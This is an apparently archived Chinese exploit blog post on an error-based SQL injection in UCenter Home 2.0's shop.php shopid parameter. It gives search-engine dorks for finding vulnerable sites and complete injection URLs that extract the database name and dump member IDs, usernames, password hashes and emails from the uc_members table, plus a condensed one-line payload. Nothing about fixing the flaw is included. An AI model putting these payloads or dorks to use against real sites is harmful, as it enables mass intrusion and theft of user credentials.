UCenter Home 2.0 SQL注入漏洞

2010, September 17, 10:39 PM. oday收藏
Submitted by admin

官方主页:http://u.discuz.net

批量关键词

Dork 1: Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

 

漏洞文件 : Shop.php

漏洞参数: (?)ac=view&shopid=
漏洞类型 : SQL Injection (MySQL Error Based)

 

EXP:

1,得到数据库名称

http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

大小: 48.65 K
尺寸: 500 x 148
浏览: 87 次
点击打开新窗口浏览全图

红色部分要在下面的语句中替换。

 

 

2,注入得到帐户密码信息

http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

大小: 75.56 K
尺寸: 500 x 131
浏览: 190 次
点击打开新窗口浏览全图

面要两句,比较麻烦,其实一句也可以搞定

 

and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

 

直接这一句就行了,不要database

Tags: ucenter

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):